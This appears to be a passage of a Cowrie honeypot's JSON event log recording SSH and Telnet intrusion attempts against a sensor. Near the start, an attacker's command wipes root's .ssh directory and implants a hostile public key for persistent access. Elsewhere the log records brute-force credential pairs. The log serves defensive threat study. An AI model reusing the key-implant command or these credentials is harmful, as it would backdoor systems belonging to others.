{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:00:05.075056Z","src_ip":"103.12.154.87","session":"6ad45b9e6277"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:00:05.076222Z","src_ip":"103.12.154.87","session":"6ad45b9e6277"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:00:05.770570Z","src_ip":"103.12.154.87","session":"6ad45b9e6277"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:00:06.268959Z","src_ip":"103.12.154.87","session":"6ad45b9e6277"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T07:00:06.270049Z","src_ip":"103.12.154.87","session":"6ad45b9e6277"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T07:00:06.954446Z","src_ip":"103.12.154.87","session":"6ad45b9e6277"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:00:06.955740Z","src_ip":"103.12.154.87","session":"6ad45b9e6277"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":32854,"dst_ip":"1.2.3.4","dst_port":22,"session":"61e36413bfdd","protocol":"ssh","message":"New connection: 103.12.154.87:32854 (1.2.3.4:22) [session: 61e36413bfdd]","sensor":"my-vps","timestamp":"2025-08-26T07:00:08.160764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:00:08.163156Z","src_ip":"103.12.154.87","session":"61e36413bfdd"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:00:08.306276Z","src_ip":"212.227.235.229","session":"9974c76f4ecb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:00:08.368492Z","src_ip":"103.12.154.87","session":"61e36413bfdd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T07:00:09.194715Z","src_ip":"103.12.154.87","session":"61e36413bfdd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:00:11.917128Z","src_ip":"212.227.235.229","session":"ab147515f0a0"}
{"eventid":"cowrie.session.closed","duration":180.21916675567627,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:00:11.922468Z","src_ip":"212.227.235.229","session":"ab147515f0a0"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:00:15.201809Z","src_ip":"103.12.154.87","session":"61e36413bfdd"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":35656,"dst_ip":"1.2.3.4","dst_port":22,"session":"68de246b3ffc","protocol":"ssh","message":"New connection: 103.12.154.87:35656 (1.2.3.4:22) [session: 68de246b3ffc]","sensor":"my-vps","timestamp":"2025-08-26T07:00:15.428231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:00:15.431836Z","src_ip":"103.12.154.87","session":"68de246b3ffc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:00:15.655552Z","src_ip":"103.12.154.87","session":"68de246b3ffc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:00:16.557317Z","src_ip":"103.12.154.87","session":"68de246b3ffc"}
{"eventid":"cowrie.session.closed","duration":"13.8","message":"Connection lost after 13.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:00:16.784902Z","src_ip":"103.12.154.87","session":"6ad45b9e6277"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:00:16.788312Z","src_ip":"103.12.154.87","session":"68de246b3ffc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":65129,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ccc52937638","protocol":"ssh","message":"New connection: 212.227.125.160:65129 (1.2.3.4:22) [session: 0ccc52937638]","sensor":"my-vps","timestamp":"2025-08-26T07:00:25.123915Z"}
{"eventid":"cowrie.client.version","version":"\u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","message":"Remote SSH version: \u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","sensor":"my-vps","timestamp":"2025-08-26T07:00:25.125073Z","src_ip":"212.227.125.160","session":"0ccc52937638"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:00:25.125891Z","src_ip":"212.227.125.160","session":"0ccc52937638"}
{"eventid":"cowrie.session.connect","src_ip":"121.151.79.102","src_port":45478,"dst_ip":"1.2.3.4","dst_port":23,"session":"ff38c69b741c","protocol":"telnet","message":"New connection: 121.151.79.102:45478 (1.2.3.4:23) [session: ff38c69b741c]","sensor":"my-vps","timestamp":"2025-08-26T07:00:31.417802Z"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":53486,"dst_ip":"1.2.3.4","dst_port":23,"session":"1a3db5973a44","protocol":"telnet","message":"New connection: 42.87.185.109:53486 (1.2.3.4:23) [session: 1a3db5973a44]","sensor":"my-vps","timestamp":"2025-08-26T07:00:51.325943Z"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":53491,"dst_ip":"1.2.3.4","dst_port":23,"session":"cb6e13a60c81","protocol":"telnet","message":"New connection: 42.87.185.109:53491 (1.2.3.4:23) [session: cb6e13a60c81]","sensor":"my-vps","timestamp":"2025-08-26T07:00:52.080953Z"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":53609,"dst_ip":"1.2.3.4","dst_port":23,"session":"b7844ad5e45f","protocol":"telnet","message":"New connection: 42.87.185.109:53609 (1.2.3.4:23) [session: b7844ad5e45f]","sensor":"my-vps","timestamp":"2025-08-26T07:00:58.241350Z"}
{"eventid":"cowrie.session.closed","duration":30.40417504310608,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:01.821922Z","src_ip":"121.151.79.102","session":"ff38c69b741c"}
{"eventid":"cowrie.session.closed","duration":12.729207992553711,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:04.055084Z","src_ip":"42.87.185.109","session":"1a3db5973a44"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":53692,"dst_ip":"1.2.3.4","dst_port":23,"session":"94eb4cd991ed","protocol":"telnet","message":"New connection: 42.87.185.109:53692 (1.2.3.4:23) [session: 94eb4cd991ed]","sensor":"my-vps","timestamp":"2025-08-26T07:01:04.214023Z"}
{"eventid":"cowrie.session.closed","duration":12.978298664093018,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:05.059187Z","src_ip":"42.87.185.109","session":"cb6e13a60c81"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":53701,"dst_ip":"1.2.3.4","dst_port":23,"session":"0618668d2c4d","protocol":"telnet","message":"New connection: 42.87.185.109:53701 (1.2.3.4:23) [session: 0618668d2c4d]","sensor":"my-vps","timestamp":"2025-08-26T07:01:05.263927Z"}
{"eventid":"cowrie.session.closed","duration":12.69721007347107,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:10.938497Z","src_ip":"42.87.185.109","session":"b7844ad5e45f"}
{"eventid":"cowrie.session.closed","duration":12.721713781356812,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:16.935666Z","src_ip":"42.87.185.109","session":"94eb4cd991ed"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":53914,"dst_ip":"1.2.3.4","dst_port":23,"session":"0b91951f11eb","protocol":"telnet","message":"New connection: 42.87.185.109:53914 (1.2.3.4:23) [session: 0b91951f11eb]","sensor":"my-vps","timestamp":"2025-08-26T07:01:17.149510Z"}
{"eventid":"cowrie.session.closed","duration":12.760321617126465,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:18.024176Z","src_ip":"42.87.185.109","session":"0618668d2c4d"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":53925,"dst_ip":"1.2.3.4","dst_port":23,"session":"c2b32eb0f73e","protocol":"telnet","message":"New connection: 42.87.185.109:53925 (1.2.3.4:23) [session: c2b32eb0f73e]","sensor":"my-vps","timestamp":"2025-08-26T07:01:19.351676Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":57588,"dst_ip":"1.2.3.4","dst_port":22,"session":"8305322beff9","protocol":"ssh","message":"New connection: 103.12.154.87:57588 (1.2.3.4:22) [session: 8305322beff9]","sensor":"my-vps","timestamp":"2025-08-26T07:01:21.512365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:01:21.513040Z","src_ip":"103.12.154.87","session":"8305322beff9"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":54070,"dst_ip":"1.2.3.4","dst_port":23,"session":"d25bdee5252a","protocol":"telnet","message":"New connection: 42.87.185.109:54070 (1.2.3.4:23) [session: d25bdee5252a]","sensor":"my-vps","timestamp":"2025-08-26T07:01:22.699680Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:01:23.789674Z","src_ip":"103.12.154.87","session":"8305322beff9"}
{"eventid":"cowrie.login.failed","username":"ssa","password":"ssa","message":"login attempt [ssa/ssa] failed","sensor":"my-vps","timestamp":"2025-08-26T07:01:24.675244Z","src_ip":"103.12.154.87","session":"8305322beff9"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:25.889090Z","src_ip":"103.12.154.87","session":"8305322beff9"}
{"eventid":"cowrie.session.closed","duration":12.705601453781128,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:29.855015Z","src_ip":"42.87.185.109","session":"0b91951f11eb"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":54134,"dst_ip":"1.2.3.4","dst_port":23,"session":"16dd18311118","protocol":"telnet","message":"New connection: 42.87.185.109:54134 (1.2.3.4:23) [session: 16dd18311118]","sensor":"my-vps","timestamp":"2025-08-26T07:01:30.185647Z"}
{"eventid":"cowrie.session.closed","duration":12.660623788833618,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:32.012236Z","src_ip":"42.87.185.109","session":"c2b32eb0f73e"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":54248,"dst_ip":"1.2.3.4","dst_port":23,"session":"9f2dc2641635","protocol":"telnet","message":"New connection: 42.87.185.109:54248 (1.2.3.4:23) [session: 9f2dc2641635]","sensor":"my-vps","timestamp":"2025-08-26T07:01:32.139036Z"}
{"eventid":"cowrie.session.closed","duration":13.25037932395935,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:35.949991Z","src_ip":"42.87.185.109","session":"d25bdee5252a"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":54289,"dst_ip":"1.2.3.4","dst_port":23,"session":"271a0be0b199","protocol":"telnet","message":"New connection: 42.87.185.109:54289 (1.2.3.4:23) [session: 271a0be0b199]","sensor":"my-vps","timestamp":"2025-08-26T07:01:36.140647Z"}
{"eventid":"cowrie.session.closed","duration":12.799592971801758,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:42.985170Z","src_ip":"42.87.185.109","session":"16dd18311118"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":54447,"dst_ip":"1.2.3.4","dst_port":23,"session":"9f0213278466","protocol":"telnet","message":"New connection: 42.87.185.109:54447 (1.2.3.4:23) [session: 9f0213278466]","sensor":"my-vps","timestamp":"2025-08-26T07:01:43.146123Z"}
{"eventid":"cowrie.session.closed","duration":12.772895812988281,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:44.911836Z","src_ip":"42.87.185.109","session":"9f2dc2641635"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":54473,"dst_ip":"1.2.3.4","dst_port":23,"session":"5a8f311d2369","protocol":"telnet","message":"New connection: 42.87.185.109:54473 (1.2.3.4:23) [session: 5a8f311d2369]","sensor":"my-vps","timestamp":"2025-08-26T07:01:45.078020Z"}
{"eventid":"cowrie.session.closed","duration":12.735090732574463,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:48.875672Z","src_ip":"42.87.185.109","session":"271a0be0b199"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":54503,"dst_ip":"1.2.3.4","dst_port":23,"session":"262286523db4","protocol":"telnet","message":"New connection: 42.87.185.109:54503 (1.2.3.4:23) [session: 262286523db4]","sensor":"my-vps","timestamp":"2025-08-26T07:01:49.063508Z"}
{"eventid":"cowrie.session.closed","duration":12.773844718933105,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:55.918951Z","src_ip":"42.87.185.109","session":"9f0213278466"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":54676,"dst_ip":"1.2.3.4","dst_port":23,"session":"e547e6170318","protocol":"telnet","message":"New connection: 42.87.185.109:54676 (1.2.3.4:23) [session: e547e6170318]","sensor":"my-vps","timestamp":"2025-08-26T07:01:56.151264Z"}
{"eventid":"cowrie.session.closed","duration":12.719616174697876,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:01:57.797534Z","src_ip":"42.87.185.109","session":"5a8f311d2369"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":54692,"dst_ip":"1.2.3.4","dst_port":23,"session":"c422fbeb93fc","protocol":"telnet","message":"New connection: 42.87.185.109:54692 (1.2.3.4:23) [session: c422fbeb93fc]","sensor":"my-vps","timestamp":"2025-08-26T07:01:57.999022Z"}
{"eventid":"cowrie.session.closed","duration":12.89529824256897,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:01.958716Z","src_ip":"42.87.185.109","session":"262286523db4"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":54725,"dst_ip":"1.2.3.4","dst_port":23,"session":"47782345bea5","protocol":"telnet","message":"New connection: 42.87.185.109:54725 (1.2.3.4:23) [session: 47782345bea5]","sensor":"my-vps","timestamp":"2025-08-26T07:02:02.168812Z"}
{"eventid":"cowrie.session.closed","duration":12.744046688079834,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:08.895239Z","src_ip":"42.87.185.109","session":"e547e6170318"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":54891,"dst_ip":"1.2.3.4","dst_port":23,"session":"ca0e4e9b30de","protocol":"telnet","message":"New connection: 42.87.185.109:54891 (1.2.3.4:23) [session: ca0e4e9b30de]","sensor":"my-vps","timestamp":"2025-08-26T07:02:09.057442Z"}
{"eventid":"cowrie.session.closed","duration":12.799867153167725,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:10.798790Z","src_ip":"42.87.185.109","session":"c422fbeb93fc"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":54908,"dst_ip":"1.2.3.4","dst_port":23,"session":"d9641c604c13","protocol":"telnet","message":"New connection: 42.87.185.109:54908 (1.2.3.4:23) [session: d9641c604c13]","sensor":"my-vps","timestamp":"2025-08-26T07:02:11.021873Z"}
{"eventid":"cowrie.session.closed","duration":12.74659013748169,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:14.915291Z","src_ip":"42.87.185.109","session":"47782345bea5"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":55015,"dst_ip":"1.2.3.4","dst_port":23,"session":"e6b3e65cce01","protocol":"telnet","message":"New connection: 42.87.185.109:55015 (1.2.3.4:23) [session: e6b3e65cce01]","sensor":"my-vps","timestamp":"2025-08-26T07:02:15.121502Z"}
{"eventid":"cowrie.session.closed","duration":13.002960681915283,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:22.060332Z","src_ip":"42.87.185.109","session":"ca0e4e9b30de"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":55104,"dst_ip":"1.2.3.4","dst_port":23,"session":"28dbc7da16b4","protocol":"telnet","message":"New connection: 42.87.185.109:55104 (1.2.3.4:23) [session: 28dbc7da16b4]","sensor":"my-vps","timestamp":"2025-08-26T07:02:22.229327Z"}
{"eventid":"cowrie.session.closed","duration":12.883553504943848,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:23.905358Z","src_ip":"42.87.185.109","session":"d9641c604c13"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":55130,"dst_ip":"1.2.3.4","dst_port":23,"session":"4dfd817df08e","protocol":"telnet","message":"New connection: 42.87.185.109:55130 (1.2.3.4:23) [session: 4dfd817df08e]","sensor":"my-vps","timestamp":"2025-08-26T07:02:24.080982Z"}
{"eventid":"cowrie.session.closed","duration":12.680190324783325,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:27.801601Z","src_ip":"42.87.185.109","session":"e6b3e65cce01"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":55269,"dst_ip":"1.2.3.4","dst_port":23,"session":"75b072b1be1a","protocol":"telnet","message":"New connection: 42.87.185.109:55269 (1.2.3.4:23) [session: 75b072b1be1a]","sensor":"my-vps","timestamp":"2025-08-26T07:02:28.021725Z"}
{"eventid":"cowrie.session.closed","duration":12.773905515670776,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:35.003160Z","src_ip":"42.87.185.109","session":"28dbc7da16b4"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":55328,"dst_ip":"1.2.3.4","dst_port":23,"session":"dec4b2716542","protocol":"telnet","message":"New connection: 42.87.185.109:55328 (1.2.3.4:23) [session: dec4b2716542]","sensor":"my-vps","timestamp":"2025-08-26T07:02:35.170357Z"}
{"eventid":"cowrie.session.closed","duration":12.827280044555664,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:36.908196Z","src_ip":"42.87.185.109","session":"4dfd817df08e"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":55415,"dst_ip":"1.2.3.4","dst_port":23,"session":"cb402536e7f5","protocol":"telnet","message":"New connection: 42.87.185.109:55415 (1.2.3.4:23) [session: cb402536e7f5]","sensor":"my-vps","timestamp":"2025-08-26T07:02:37.091170Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":55646,"dst_ip":"1.2.3.4","dst_port":22,"session":"8187da426da8","protocol":"ssh","message":"New connection: 103.12.154.87:55646 (1.2.3.4:22) [session: 8187da426da8]","sensor":"my-vps","timestamp":"2025-08-26T07:02:38.637728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:02:38.638812Z","src_ip":"103.12.154.87","session":"8187da426da8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"